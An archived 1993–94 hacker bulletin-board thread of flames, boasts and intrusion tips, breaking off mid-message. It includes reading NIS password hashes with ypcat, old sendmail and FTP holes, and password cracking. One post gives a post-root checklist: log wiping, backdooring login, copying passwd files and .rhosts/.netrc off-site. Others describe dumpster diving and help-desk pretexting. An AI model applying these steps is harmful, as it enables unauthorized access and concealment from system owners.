idiot can get accounts. So, all of you people who would wish to know more. When you have a uquestion ask yourself this one simple one first: "Have I even tried reading some man pages on this subject yet?" If you answer no to that, then you really shoud find a new hobby. And the man pages are just the first of many places to find information. And last of all: BE PATIENT. Nothing comes up and smacks you in the ass. You have to spend a lot of time on it. If you really have no tother interest in anything in the data world than hacking you really should give up now. You need to be informed of the larger data world. I could go on for a few hundred more lines, but I won't (I would not want to subject you to anymore of my many typos). So, remeber, if anyone wishes to ask questions of those who may know the answer or provide some insight on where to find the answer please take the time and effort to atleast try and solve it yourself or be informed as to the nature of the question. Its simple, but its not easy. -The Pyro. From abort@yabbs Mon Dec 6 14:07:39 1993 From: abort@yabbs To: pyro@yabbs Subject: re: whine whine whine Date: Mon Dec 6 14:07:39 1993 Bravo, my sentiments exactly, i flamed you guys at first because i admit I only caught the tail end of the ongoing war. So now can we get to some stuff besides flames. I mean I can get enough shit like that and red-boxes at ISCA whee i usually sit out the boring hours. I am in no way saying that I am hck-god or whatever, I have only been going for about three or ofur months. I think i have progressed far for my time, but I cant help but think ho wfar I havce to go just to satisfy my own curiosity about things like connectivity in Inet, and the like. I have a few friends, who i hope sont read this, who say they are into hacking. BUT it seems all they do is ask questions and borow my books. I spent most of the last four months online, close to 53% of my time would be a reasonable estimate. Yeha it seems a bit high but i can t help myself. . Here is a ton more shit than cracking accounts, as a matter o fact any newbie who knows how to compile and run a program on UNIX can do it. The real fun is in getting accounts not by cracking pwords, but by going thru holes, like the sendmail one a while ago was good(no it does not work now so dont ask me about it) as well as neato tricks with menu systems and gopher servers.. If you read ISCA Undeground room(comedy central really) you will see my name in the room info as one to start people in the right direction for learning. I have it easy I just have a macro set up that bombarsds there mail with about 20 lines of "READ READ READ READ" and then a list of sites to look From cosmos@yabbs Mon Dec 6 14:20:00 1993 From: cosmos@yabbs To: abort@yabbs Subject: re: whine whine whine Date: Mon Dec 6 14:20:00 1993 Sigh.... Pyro, perfectly stated. abort, I fail too see why you intensely flamed pyro and me during the latest bandwagon if you did not read the whole thread. That is what is termed lame. Anyways, your analysis of "the sendmail bug does not work anymore" is ludicrous and outright false. Shit, I just performed it this morning on my own site. The only way the sendmail bugs do not work is if the admins are smart enough to a) patch their binaries or b) install the latest version. I would estimate that a vast quantity of sendmail servers are still loaded with the bug(s). On another note, I also found some sites with the infamous quote cwd ~root bug in ftp today. If you know what you are doing you will recognize that one. Needless to say, that one is a bit more rare to find. :) Cosmos From BattleAn@yabbs Mon Dec 6 15:01:38 1993 From: BattleAn@yabbs To: all@yabbs Subject: Hacking. Date: Mon Dec 6 15:01:38 1993 Oki. lets try do talk some hacking here, and cut the flamewaras. I am currently looking for two things. Source code for a routert. And a way to get those shadow pwfiles without super-user axs. I'm not talking about any of those lame progs that go around on irc, which basically only merge passwd and shadow IF u have root axs. Can anyone help me? Source codes, docs, good ideas, bad ideas.... Battle Angel. P.S. Norwegian hack scene rulz. Most ppl on the net. -) From abort@yabbs Mon Dec 6 15:11:11 1993 From: abort@yabbs To: BattleAn@yabbs Subject: re: Hacking. Date: Mon Dec 6 15:11:11 1993 I dont know if this will help but ypcat command has helped me a few times on sites around here that had no passwd per se in the passwd feild of concatenize the entries in a certain datafielld or base lay with ypcat and it may help you out. From abort@yabbs Mon Dec 6 15:23:00 1993 From: abort@yabbs To: all@yabbs Subject: re: Hacking. Date: Mon Dec 6 15:23:00 1993 OK sorry for second message but I manned ypcat, ypmatch, ypfile and came up with this. First the yp stands for yellow pages. This is a map or set of nicknames for databases that are use throughout a network. It hs to do with NIS dta bases. Basically you ypcat a nicknamed data base to cat it. The actuall passwds are in passwd.byname but ypcat passwd does just fine. The rest is up to you to figrue out. From HCELINE@yabbs Wed Jan 12 03:08:12 1994 From: HCELINE@yabbs To: all@yabbs Subject: Shadowd PW files: Date: Wed Jan 12 03:08:12 1994 OKay, first off, I'm new here, But forget introductions. There has recently been alot of talk about Shadowd Password files, on multiple nets I'm on. Personally, I have never been on a systems with one. Of course, I spend most of my time on VAX, and DEC Servers, with a touch of AMOS thrown in. Can someone throw down info on the Shadowed Password file, such as the differences between SPWF (Shadowed Password Files) and the common ones found in etc/pw. I am clueless when it comes to most inner working of unix, so the help would be appriciated. If anyone needs help with VAX, I'm perfectly willing to help. Hagbard Celine [ELF] From Spara@yabbs Wed Jan 12 23:25:04 1994 From: Spara@yabbs To: HCELINE@yabbs Subject: re: Shadowd PW files: Date: Wed Jan 12 23:25:04 1994 I'm not that educated in VAX/VMS myself. Generally, what kind of security problems does VMS have? Default accounts and little tricks. From Nomad@yabbs Sat Jan 15 14:17:08 1994 From: Nomad@yabbs To: all@yabbs Subject: VAX/VMS Date: Sat Jan 15 14:17:08 1994 I really don't know much about VAX/VMS except for some limited DCL programming and certain system admin. programs (authorize, ncp, etc) but I have access to some very important machines that are running VAX/VMS and I would like to know how to get the most out of each system. Under unix it is rather simple but VMS appears to be a different story altogher. Maybe I am wrong. What should I look for on VMS Systems? Do ppl still write patches for them? Do VMS hackers go thru the work of learning MACRO-32? What about encrypt/compare for sysuaf.dat? What about patches for set host, etc? Any help would be greatly appreciated. I am looking for someone with a good deal of experience with VMS that I can share these findings with in return for information and findings on the system. Anyone filling the bill leave me mail with you e-mail address.... No flames please, I am a big boy now. Flaming is lame. Nomad From Alvin@yabbs Sat Jan 15 21:46:19 1994 From: Alvin@yabbs To: all@yabbs Subject: Date: Sat Jan 15 21:46:19 1994 Does anyone have CrackerJack 1.5? From tknight@yabbs Sun Jan 16 17:16:14 1994 From: tknight@yabbs To: HCELINE@yabbs Subject: hey man... Date: Sun Jan 16 17:16:14 1994 Hey hagbard,its Tobias. Tobias Knight [ELF] From Fastjack@yabbs Mon Jan 17 07:05:21 1994 From: Fastjack@yabbs To: HCELINE@yabbs Subject: re: Shadowd PW files: Date: Mon Jan 17 07:05:21 1994 Hello Hagbard... Here's a little bit of info about Shadowed password files. I am most familiar with the SunOS implementation, but I have examined (ie tried to hack) others on Ultrix and SVR4. In a non-shadowed passwd file, the passwords are the encrypted strings in the second entry of each line: mylogin:Rh62jpr4:0:something:something.etc:you-get-the-idea:more:csh or thereabouts. As has been pointed out, it is generally impossible/impractacle to decrypt the encrypted strings, but programs to encipher dictionary entries and then compare them to the encrypted strings can get 10-30% of the passwords (this is highly variable; depends on the difficulty of the passwords and also the time you spend cracking-- it isn't practical to spend an extra 12 hours to get an extra handful). Everyone has read access to the /etc/passwd file; you can see the obvious security hole here. The shadowed password file is an additional file containign the real passwords that can't be read...the original passwd file has something else substituted in the place of the encrypted password. mylogin:##mylogin:1234:something:somethingelse....... on SunOS, where the real encrypted string would be hidden in mylogin:*:1234:somemorestuffthatsactuallyimportantifyoulook:..... AT&T SVR4 has the passwords in /etc/shadow; hence 'shadowed passwords'. Figuring out how to read the file is the real trick.... Yes, I know that mylogin is root in the first example... Fastjack From mephisto@yabbs Tue Jan 18 23:12:14 1994 From: mephisto@yabbs To: Fastjack@yabbs Subject: re: Shadowd PW files: Date: Tue Jan 18 23:12:14 1994 What does an 'x' in the password field of a passwd file mean? Normal accounts have visible passwords, but some (i.e. uucp, daemon, etc) have an 'x' in the password field... are these passwords shadowed? From htoaster@yabbs Tue Jan 18 23:44:14 1994 From: htoaster@yabbs To: mephisto@yabbs Subject: re: Shadowd PW files: Date: Tue Jan 18 23:44:14 1994 In message re: Shadowd PW files:, mephisto said: > What does an 'x' in the password field of a passwd file mean? Normal > accounts have visible passwords, but some (i.e. uucp, daemon, etc) have > an 'x' in the password field... are these passwords shadowed? It just means that it is an invalid login. The crypt() function encrypts to 13 characters, no matter what the input is, so it could never evaluate as equal to a one character string. htoaster From MI-5@yabbs Thu Jan 20 14:33:02 1994 From: MI-5@yabbs To: all@yabbs Subject: PW cracker Date: Thu Jan 20 14:33:02 1994 Does anyone know where I can get ahold of a good PW cracker that compares the unix pw file to a dictionary. I would like a Mac version but any will do. Thanks for your help. From Fastjack@yabbs Sat Jan 22 15:03:49 1994 From: Fastjack@yabbs To: MI-5@yabbs Subject: re: PW cracker Date: Sat Jan 22 15:03:49 1994 Ok.... Archie for Crack; the latest version is 4.1, I think. It is for Unix, and has a number of useful options. Very interesting; it can run across a number of networked machines of different types, also it can set itself up automatically when you get the archive file. I don't know of any versions for Macs, who'd want one? If you managed to find a site w/o the password file being shadowed, I'd like to hear about it. Leave a message here and we'll discuss... Fastjack From GodEater@yabbs Sat Jan 22 16:33:54 1994 From: GodEater@yabbs To: Fastjack@yabbs Subject: Shadowed PW Date: Sat Jan 22 16:33:54 1994 I have found many systems with unshadowed password files. Including U of Delaware. On the down side I know a purdue student who got busted for cracking roughly 10,000 accounts at that college and a few others. He wasn't really careless, somone told on him, not a sysop. The only trouble he is in is expulsion for 1 semester. From cosmos@yabbs Sat Jan 22 19:35:20 1994 From: cosmos@yabbs To: Fastjack@yabbs Subject: re: PW cracker Date: Sat Jan 22 19:35:20 1994 What do you mean managed??? There are shitloads of unshadowed password files out there. As for cracking them all just get one and that should be enough to grab root on any given machine. If they have an unshadowed pw file they can probably be hit with rdist or other goodies... Cosmos From Fastjack@yabbs Sat Jan 22 21:16:01 1994 From: Fastjack@yabbs To: cosmos@yabbs Subject: re: PW cracker Date: Sat Jan 22 21:16:01 1994 cosmos-- I doubt that cracking a given pw file 'should be enough to grab root on any given machine'. At my site, the passwd is shared between a number of administrators, but is a very difficult one (see a file on password security), ie, no recognizable words, alphanumerics w/ special [!@#$%^&}] characters, control codes, etc. But I do appreciate the input... Fastjack From abort@yabbs Sun Jan 23 00:20:00 1994 From: abort@yabbs To: all@yabbs Subject: re: PW cracker Date: Sun Jan 23 00:20:00 1994 WEll Fastjack, I dont think cosmos was talking about grabbing the actual passwd to the root acount from the unshadoewd pword file. He meant hacking it out once in the system. I assume that he meant once your in there is usually a way to get root. Like playing with suid programs, and general mayhem you can get done with any account really. Once you get an account, unless the system is really high security you can probably get root if you know what your doing. ALSO, someone stated that a "x" or "*" means that it is an invalid account. That's not really true. As I have seen "*" used to mark a shadowed passwd file. It's used as a marker. I have also seen and heard of something like "x" bieng used to fill a place in the passwd field of a invalid account. Like they do it to uucp and other normally default accounts. This renders it impossbile to login to that account, but they need to be there for certain system operations. From cosmos@yabbs Sun Jan 23 13:05:16 1994 From: cosmos@yabbs To: Fastjack@yabbs Subject: re: PW cracker Date: Sun Jan 23 13:05:16 1994 Please dont condescend me. You are the one who does not know what he is talking about. Who the hell cares if the password is shared between several administrators. Once you have ANY given shell account you only then need to exploit any given number of holes and work from there. As for reading about it, I could lecture at hand for hours about password file manipulation. Read carefully before you try to appear knowleadgeable. Cosmos From Fastjack@yabbs Sun Jan 23 16:24:15 1994 From: Fastjack@yabbs To: cosmos@yabbs Subject: re: PW cracker Date: Sun Jan 23 16:24:15 1994 Ok cosmos... *sorry* for the _misunderstanding_. Guess I should stop trying to admin and just get back to cracking. I was in err; it is indeed possible to go root on *many* machines utilizing well-known security holes. It must be remembered that any site w/o a shadowed passwd file is [to put it midly...heheheh] to apply the patches that CERT deems necessary. Now that we have gotten past that point, why don't we discuss something interesting, like what you'd do with root once you had it. Besides the obvious, like set up an account for yourself (if no cron job runs to diff it w/ the hidden backup) read mail spool (booooooring) erase yourself from audit logs (ho hum, ho hum). Other that utilizing existing gains to allow further penetration, what is there? From someone who has experienced the phenomena of avatar, it ain't all it's cracked up to be. I'd like to hear some thoughts-- personal opinions; no flame wars because someone doesn't follow you 4 step process for cracking systems. And cosmos, just how long have you yourself been on Unix boxes, eh? Fastjack From cosmos@yabbs Sun Jan 23 16:32:51 1994 From: cosmos@yabbs To: Fastjack@yabbs Subject: re: PW cracker Date: Sun Jan 23 16:32:51 1994 I am still trying to comprehend what the hell "stop trying to admin and get back to cracking" means. UNIX boxes?? Well, 1983 was my first experience with UNIX as an OS. In 1985 I picked up an ATT UNIX miniframe running SYS V rel 2 with some BSD extensions and some rel 3 extensisons added later. What do you do?? Depends on your own personal choice. I always just enjoyed the hack initself. Once I got root, that was that. On to the next machine. I never destroyed shit or made accounts for friends etc... The only thing I can recall ever doing that was beyond getting root was downloading/transfering source code for AT&T Sys V rel 3.2.2 a few years back. I admin. I hack. They complement each other. Cosmos From Justin@yabbs Mon Jan 24 19:10:27 1994 From: Justin@yabbs To: fastjack@yabbs Subject: new at this Date: Mon Jan 24 19:10:27 1994 I've been reading some of the messages on the crack stuff for awhile now. I'm new to the UNIX based machines, but highly familer to the dos based stuff. The only way I was able to crack and IBM -based corp, was to drive by in my pickup at night before the weekly trash pickup, and nab about three good bags of garbage. This gave payroll receipts for employee names, etc. And also possible dialups. If I got lucky, I was able to call into the tech-support area (if the corporation was large enough) and claim to be "Bob from the LAN area remote sight who forgot his password." As an example. I have just enrolled as a freshman recently, and am new to the UNIX based network. I am quite frustrated of not being able to access certain community boards because I can't find their address to get a new log-on. Any help would be appericiated in code-cracking. -Justin From Fastjack@yabbs Mon Jan 24 19:29:39 1994 From: Fastjack@yabbs To: Justin@yabbs Subject: re: new at this Date: Mon Jan 24 19:29:39 1994 Okay, I'm not sure what you're asking... Do you mean the Internet IP numbers for Net BBSs that are local to you or phone numbers for PC boards near your school? Either way, best bet is to ask around there-- get to know some people who know what they are doing, ask questions, but don't ask questions you don't have to. Play around- do some work-- nobody apreciates giving away info to somebody who wants it all handed on a silver platter. Too many people like that on the Net. Just read, listen, and keep your mouth shut about anything you don't know about.... About code-cracking: If you mean to crack Unix systems, it's best to get at least one legit account (I assume you have one) and proceed from there. Also, *don't* hack your own site-- they can get you easier and hurt you more if you do--and it doesn't help you in any way to crash your server... Fastjack From Fastjack@yabbs Mon Jan 24 20:03:23 1994 From: Fastjack@yabbs To: cosmos@yabbs Subject: re: PW cracker Date: Mon Jan 24 20:03:23 1994 Okay....What I meant by 'stop trying to admin and get back to cracking was that I've been spending amore time recently running shit (and I'm not used to it from an admin's view, but I need the experience) that I haven't been 'just cracking' like I used to-- Of course, I was stupid then, and I know a lot more than I did when I was younger-- but the net effect is similar. Instead of deciding whether to guess passwords or write simple trojan scripts, I now ponder the advantages of getting an Intel-based Unix on a 486 against a used Sun workstation. Guess it's good to broaden your horizons....From *both* points of view. I'd still like to hear from people what they would do as root-- those who have it as well as those who don't. I, I have it legit-- and it is boooooring... Fastjack From Nomad@yabbs Tue Jan 25 04:26:37 1994 From: Nomad@yabbs To: Fastjack@yabbs Subject: First steps Date: Tue Jan 25 04:26:37 1994 I can't believe that this is as lively as this sub gets.... First steps for me AFTER gaining root: 1) Check for the existance of security programs. Look in the crons, /etc/security, /usr/adm/messages*, /etc/syslogd.conf, and any others that come to mind. 2) Remove myself from ALL logs possible. (utmp, wtmp, lastlog, and any other's found in syslogd.conf. 3) Secure myself in (patch login, set up a port, rcp the passwd file to a remote host) 4) Check out the system resources; How often do the telnet? Do they use tip or cu? If I feel that the site will yield something fruitful thenm I set up the appropriate patches, etc. If not.... 5) Upload my find script (looks for alot of shit) and run it. Searches for *.zip *.exe *.c .netrc .rhosts *.whatever. 6) Check out the .netrc files! These things are great for infecting other systems. type 'man netrc' 7) Copy all .netrc and .rhosts files to my machine to insure future access if my account dies or my patch is removed. 8) Browse.... Erase core files (hell i don't know)... Look at mail. If they use cu and have it set up see if I can use it. Wow another Internet outdial. Well anyway I am recieving a talk request... I will respond to any and all comments from users. From cosmos@yabbs Tue Jan 25 05:39:52 1994 From: cosmos@yabbs To: Fastjack@yabbs Subject: re: PW cracker Date: Tue Jan 25 05:39:52 1994 BORING?? heh. I have it legit too. It is fun, ever chase a cracker through your system?? That makes for interesting work... Cosmos From nphire@yabbs Tue Jan 25 12:50:48 1994 From: nphire@yabbs To: all@yabbs Subject: Dark Box Date: Tue Jan 25 12:50:48 1994 Anybody here ever built a Dark Box? If so, how'd it work? Thanx in advace. Neurophyre [KARMA/KRA] From cosmos@yabbs Tue Jan 25 13:14:17 1994 From: cosmos@yabbs To: nphire@yabbs Subject: re: Dark Box Date: Tue Jan 25 13:14:17 1994 Sorry, cannot resist. So what 3l33t |<-RaD gr00p does KARMA/KRA stand for?? Cosmos From Justin@yabbs Tue Jan 25 13:52:33 1994 From: Justin@yabbs To: Nomad@yabbs Subject: re: First steps Date: Tue Jan 25 13:52:33 1994 This makes interesting reading. So for the amateur, when you've first secured a "relatively secure Internet address, and let's say that you wander upon a random board that you can't access, then how do you recon the system? How do you find user names, or set up accounts? I think I'm grasping the concept, and I'm listening. I'm just on shakey ground as where to start. Any help however small would be greatly appericiated. -J From nphire@yabbs Tue Jan 25 15:09:32 1994 From: nphire@yabbs To: cosmos@yabbs Subject: AhBullShiyit Date: Tue Jan 25 15:09:32 1994 Goddammit, will you quit ragging on me because of KARMA?! There is no reason why you have to be such an ass about this. Now, I asked a question about Dark Boxes. If you want to answer it, fine. If not, fine. From cosmos@yabbs Tue Jan 25 15:21:57 1994 From: cosmos@yabbs To: Justin@yabbs Subject: re: First steps Date: Tue Jan 25 15:21:57 1994 Forgive me if I am intruding, but what do you mean "board"?? If you are referring to a bulletin board based server like yabbs then you are not going to find a multitude of them. This is not ms-dos and windows weenie land. Now explain to me why you would want to break into an internet BBS anyway...90% if not 100% of them are public and accessible anyways. To go on, if you want to compromise the security on an internet site then the first approach is not to ask "hey, how do I do it" but to learn and absorb the operating system. This is not the easiest of tasks. Unlike the 80's, the internet is now relatively secure to the average attacker. Learn UNIX. Learn it, study it, and live it. Get all the books you can about UNIX, find a local provider, school, etc... and get aquainted to using UNIX. If you are on an intel platform get netBSD(or LINUX if you are inclined), macintosh get macBSD. Play with it and expirement with everything. Yes, welcome to hacking 101. More books, time, and sweat thatn any damn college course you will ever take. NEVER beg for accounts, and expect a silver platter to be handed to you. Hacking is not picking up some cool t-philes and typing some commands. It is a philosophy and an intense understanding and knowledge of computers and operating systems, and is not limited to the uebercracker(thank you Dan Farmer) but to any person who accomplishes their goal through undocumented or abstract methods. My $.02 Cosmos From cosmos@yabbs Tue Jan 25 15:23:12 1994 From: cosmos@yabbs To: nphire@yabbs Subject: re: AhBullShiyit Date: Tue Jan 25 15:23:12 1994 oops. Sorry, I forgot how k00l Anarchy is. Live long and prosper. Cosmos From Biro@yabbs Tue Jan 25 21:03:15 1994 From: Biro@yabbs To: nphire@yabbs Subject: a Date: Tue Jan 25 21:03:15 1994 You still haven't told us what KRMA/KRA stands for.. we're dying to know. From Tele@yabbs Tue Jan 25 21:08:42 1994 From: Tele@yabbs To: Biro@yabbs Subject: re: a Date: Tue Jan 25 21:08:42 1994 >You still haven't told us what KRMA/KRA stands for.. we're dying to know. I always thought KARMA was an ansi group.. From cosmos@yabbs Tue Jan 25 21:18:05 1994 From: cosmos@yabbs To: Tele@yabbs Subject: re: a Date: Tue Jan 25 21:18:05 1994 No No No.....I asked the 3l33t groupie himself: KARMA is an anarchist group. How original. Cosmos From Fastjack@yabbs Tue Jan 25 22:55:34 1994 From: Fastjack@yabbs To: cosmos@yabbs Subject: re: PW cracker Date: Tue Jan 25 22:55:34 1994 Well, no, I haven't had the full Cliff Stolle experience.... But the machine I run isn't scheduled to be up on the Net for a while- don't want to rush things with the crackers graduating to real systems --But you learn a lot about security from being on the other end of it. It's the best tutorial there is, imho. Why don't you let us in a little on this cracker-- we had a kinda interesting experience here at my school as well-- afraid I'd have to relate it second-hand, though.... Fastjack From Nomad@yabbs Tue Jan 25 23:39:09 1994 From: Nomad@yabbs To: cosmos@yabbs Subject: hacking... Date: Tue Jan 25 23:39:09 1994 Chasing crackers: There has gfot to be no greater experience in hacking than testing your knowledge against another cracker's. I don't mean voice where you have this little debate about who knows more or who is better. I mean online where you don't know shit about him and he doesn't even know you see him. This is especially nice if you have a few ways into the system and he is using a hacked account. I have had this experience a few times and it is a blast. I was on this small edu site with like twelve users and I fucking gave this dude hell. Found all the ways I knew of to get root and disabled them (rdist, etc); Found out where he was coming in from i case I needed to hack his site. Looked at his .history to find out what he was doing. Went to the current dir he was in amd moved the files he had put up elsewhere for future use, and kicked him off with a little message ketting him know I was a cracker and told him to fuck off and stay off my site.. That issued the challenge and he was right back. ps showed him doing a cat > gimme to attempt to get root but it did not happen. I just toyed with him for a while. Then wrote a little c program to make him sit there for a long time and then log him out and put it in his passwd entry. I could send him all sorts of hateful messages telling him how lame he was and when the time limit ran out he would be logged out and he would try it again. Finally he gave up. Christmas modemer..... hahah UNIX: cosmos is right about learning Unix inside and out. I am far from this but I feel that I know more than most (which isn't saying that much.) I have read so many books on Unix that I cannot even list them all because I forgot some of the title's. I remember one I spent a week reading this one book at a local University cos I could not get a library card unless I was a student. It took me an hour to get to the school on the bus and an hour to get back, but I was committed. I feel that if you are going to hack then you should do as much as you can by specializing in just a gfew fields. No one person can master everything but if you take your skill and put it together with a handful of people that you know and trust then you will have yourself a nice little team of hackers. Otherwise you are just going to be left out and you will just be doing the same thing over and over again. One time I spoke to an ex hacker and he told me he quit because hacking reminded him of the old cocaine commercial with the guy walking around in a circle. He is correct about so many hackers out there. Most never learn to program and really don't care to because they do not want to commit themselves to LEARNING something. They feel that what they are doing is fun and that there is no reason to learn how to program. I admit that at one time I felt the same way. Then I learned C. The little that I know about programming C on Unix has helped me immensely in my hacking exploits. Now I can't believe I ever hacked without it. Gives you something to think about. Input please................ Nomad From Tele@yabbs Wed Jan 26 01:39:46 1994 From: Tele@yabbs To: cosmos@yabbs Subject: re: a Date: Wed Jan 26 01:39:46 1994 >KARMA is an anarchist group. How original. Well its gotta be better than the groups down here. . Then again, im not too keen on groups to begin with. Tele From cosmos@yabbs Wed Jan 26 06:39:54 1994 From: cosmos@yabbs To: Fastjack@yabbs Subject: re: PW cracker Date: Wed Jan 26 06:39:54 1994 *grin* How do you think I know this stuff. But you mature and go on. System cracking is just plain not worth it anymore. IMHO, cracking a system and fooling around and going to jail is not in my list of objectives. Ruining my career over root is pointless. Couple of years back I was completley the opposite...of course I grew up in a kindler gentler arena to crack in. I got caught, I got offered a job. Today I would get offered a cell, and a huge ass fine. Cosmos From cosmos@yabbs Wed Jan 26 06:42:24 1994 From: cosmos@yabbs To: Nomad@yabbs Subject: re: hacking... Date: Wed Jan 26 06:42:24 1994 Thank you, a perfect little anecdote. Now do that as legitamite root...;) (thats what I am) Cosmos From Nomad@yabbs Wed Jan 26 15:54:37 1994 From: Nomad@yabbs To: cosmos@yabbs Subject: re: hacking... Date: Wed Jan 26 15:54:37 1994 Quit bragging. From cosmos@yabbs Wed Jan 26 18:14:21 1994 From: cosmos@yabbs To: Nomad@yabbs Subject: re: hacking... Date: Wed Jan 26 18:14:21 1994 About what?? Cosmos From Justin@yabbs Wed Jan 26 19:29:34 1994 From: Justin@yabbs To: cosmos@yabbs Subject: re: First steps Date: Wed Jan 26 19:29:34 1994 Thanks for the help. I don't want it handed down on a silver platter, but I had no idea where to start. You've been a great help to me, and now I'm off to find some UNIX books. -Justin From nphire@yabbs Wed Jan 26 22:40:21 1994 From: nphire@yabbs To: cosmos@yabbs Subject: re: AhBullShiyit Date: Wed Jan 26 22:40:21 1994 Yay. I'll bet you did. Anyway, I saw your earlier post. You can't accuse me of being a leech, because as I said someplace I am trying to learn things. In fact, the instant I get my damned 4 MB I'll be downloading Linux and attempting to install it on my system so as to learn more. See? I ain't that bad. From nphire@yabbs Wed Jan 26 22:43:14 1994 From: nphire@yabbs To: all@yabbs Subject: whining about group Date: Wed Jan 26 22:43:14 1994 Jesus christ. You call yourselves great and you dont even bother to find out anything before condemning KARMA. As for you, cosmos: You are posting all these high minded things and then tell everyone about how KARMA is an anarchist group. If you had processed the info I gave you, you would know this is not true. Its simply a name. We thought it looked ok. Oh dammit. From cosmos@yabbs Thu Jan 27 05:20:09 1994 From: cosmos@yabbs To: nphire@yabbs Subject: re: AhBullShiyit Date: Thu Jan 27 05:20:09 1994 Yeah you are, you are installing linux! ;) Cosmos From Adonis@yabbs Thu Jan 27 06:49:37 1994 From: Adonis@yabbs To: all@yabbs Subject: You guys know nothing! Date: Thu Jan 27 06:49:37 1994 Ha! I am elite. I am a true hacker unlike you girlies. I have broken into military sites, banks, schools, and businesses. I can break into any system anywhere. YOu idiots wouldnt know hacking from a hole in the ground. Email me if you want real info! Only $49.95 for information on how to access systems worldwide. From abort@yabbs Thu Jan 27 13:40:37 1994 From: abort@yabbs To: Adonis@yabbs Subject: re: You guys know nothing! Date: Thu Jan 27 13:40:37 1994 HAHAHAHAHAHAHAHAHAHAHAHA apt name fer that schpleeel of schtuff if anyone has a place where I can pick up a TASM for really really cheap, let me know please. I can't get my assemler I have now to do some stuff that I relly need done. From JasonLee@yabbs Thu Jan 27 20:17:56 1994 From: JasonLee@yabbs To: Adonis@yabbs Subject: re: You guys know nothing! Date: Thu Jan 27 20:17:56 1994 Adonis said: Ha! I am elite. I am a true hacker unlike you girlies. I have broken into military sites, banks, schools, and businesses. I can break into any system anywhere. YOu idiots wouldnt know hacking from a hole in the ground. Email me if you want real info! Only $49.95 for information on how to access systems worldwide. JasonLee: Wow, I really hope this is a joke. Damn, I wish I could be like Adonis. JasonLee From Tele@yabbs Thu Jan 27 22:13:04 1994 From: Tele@yabbs To: Adonis@yabbs Subject: re: You guys know nothing! Date: Thu Jan 27 22:13:04 1994 ill take that as a joke.. it was a joke, was'nt it? From Case@yabbs Fri Jan 28 01:57:33 1994 From: Case@yabbs To: Adonis@yabbs Subject: re: You guys know nothing! Date: Fri Jan 28 01:57:33 1994 but does a REAL hacker unravel his identity? From Nomad@yabbs Fri Jan 28 02:08:47 1994 From: Nomad@yabbs To: cosmos@yabbs Subject: re: hacking... Date: Fri Jan 28 02:08:47 1994 Quit bragging about having legit root.. jeez I should not have to paint pictures, this is not a flame Nomad From Nomad@yabbs Fri Jan 28 02:28:39 1994 From: Nomad@yabbs To: Adonis@yabbs Subject: re: You guys know nothing! Date: Fri Jan 28 02:28:39 1994 Adonis has gvot to be lamest person. To make such a broad post like that even as a joke is fucking stupid. I could take the average computer user and teach him how to safely hack banks, schools, companies, etc in less than a week. If you were a good hacker you would realize that it doesn't matter how may systems you occupy, it's what you can get from each system. I will never be impressed by the quantity of systems a person has, I will only be impressed with the quality of the systems and the hacker's ability to yield the most from each system. Adonis has only told us war stories of his exploits (which are gvery vague) and he is just calling us lame. This tells me that he is just a beginner. Anyone that is really good realizes that he was once a novice and his knowledge did not come easy. Furthermore, he would be willing to help those starting out by helping them learn the things that they need to succeed in their projects, etc. Adonis, I hope that one day you will learn what hacking is all about. I know by experience that obtaining systems has got to be the easiest part of hacking. Utilizing the given resources given and yielding information from them is a little more complex. Each system you get in can serve some purpose, be it as an ip scanner, carrier scanner, modem access to a certain area code, a password cracking site, an archive site, a place for you to test your programs, a place to set up a mail address, a bbs site, a contact site for group members (if you are in a group) and much more. If you have skills that are exceptional, I would like to hear about them. Judging from your posts I can tell that the only things you know about hacking are running scripts that give you root (rdist, div/0, etc) and Cracking passwd files. You may have some patches but so do tons of people who will never learn how to program. This can be a big flame war or you can turn this into a learning experience for everyone including yourself. Nomad From cosmos@yabbs Fri Jan 28 05:32:49 1994 From: cosmos@yabbs To: JasonLee@yabbs Subject: re: You guys know nothing! Date: Fri Jan 28 05:32:49 1994 What? Well, I charge $99.95 for my info but you also get a t-shirt with my tips. How about you JasonLee?? Whats your going rate these days... :)) Cosmos From cosmos@yabbs Fri Jan 28 09:01:15 1994 From: cosmos@yabbs To: all@yabbs Subject: Usenet Date: Fri Jan 28 09:01:15 1994 Anyone catch the *hilarious* usenet event of the day, proabably the funniest thing since Stephen Tanner's "I love little Boys" confession... Check out where some idiot(who obviously had his account hacked) posted up the entire /etc/passwd file for some pubnix site. Id love to see the admins face... Cosmos From Adonis@yabbs Fri Jan 28 13:44:14 1994 From: Adonis@yabbs To: all@yabbs Subject: Ha...lamers Date: Fri Jan 28 13:44:14 1994 Ha, I am not lame. Nomad is lame. Watch out nomad Or I will nuke all of your accounts... From Xela@yabbs Fri Jan 28 14:35:44 1994 From: Xela@yabbs To: all@yabbs Subject: Goddamn it... Date: Fri Jan 28 14:35:44 1994 ...why are you people so damn arrogant? On both sides of the issue, all that's done is bragging about ones friggin' ideals. Talk about real shit, peoples. That's what I read this message area for, not for 101 ways to brag. Look, cosmos, just get off your high horse and ignore those you hate so much if its a big deal to you! -Alex From panzer@yabbs Fri Jan 28 15:17:28 1994 From: panzer@yabbs To: adonis@yabbs Subject: Rates... Date: Fri Jan 28 15:17:28 1994 I am better than all you girlie hackers... I kick small executables in the face of wimpy sys-admins... My training can be yours for as little as $39.95 plus S/H... I am root on many systems... From JasonLee@yabbs Sat Jan 29 01:53:00 1994 From: JasonLee@yabbs To: cosmos@yabbs Subject: re: You guys know nothing! Date: Sat Jan 29 01:53:00 1994 Well, you know, I'm one of those high class hook^H^H^Hackers, so I won't reveal me rates. You know how the saying goes: If you have to ask.... JasonLee From JasonLee@yabbs Sat Jan 29 01:53:35 1994 From: JasonLee@yabbs To: Adonis@yabbs Subject: re: Ha...lamers Date: Sat Jan 29 01:53:35 1994 All right, now we KNOW it's a joke! JasonLee From Nomad@yabbs Sat Jan 29 05:07:40 1994 From: Nomad@yabbs To: Adonis@yabbs Subject: . Date: Sat Jan 29 05:07:40 1994 Watch out for Nomad you guys. Weak. Let's get some discussion going on here. Surely someone has some questions that need to be answered, I know I do. Hopefully that is the end of the flames but I know someone will have something to say. Now for my question. I am looking for a way to hide files under unix. I know that all the information is kept in dirent structures found in dirent.h but I have been toying around and have not been successfully able to accomplish this task. I spoke with someone the other day and they told me that I needed to edit the inode tables in the superblock (I think that's what he said, sounds crazy) and remove the inode from the available list so that the file will not be overwritten. The only thing I am worried about is that they file might get big enough to go over into other inodes that will later be allocated and used. Does anyone know anything about this or have files pertaining to it. I would really appreciate it. Nomad From panzer@yabbs Sun Jan 30 02:43:32 1994 From: panzer@yabbs To: Nomad@yabbs Subject: hidden files Date: 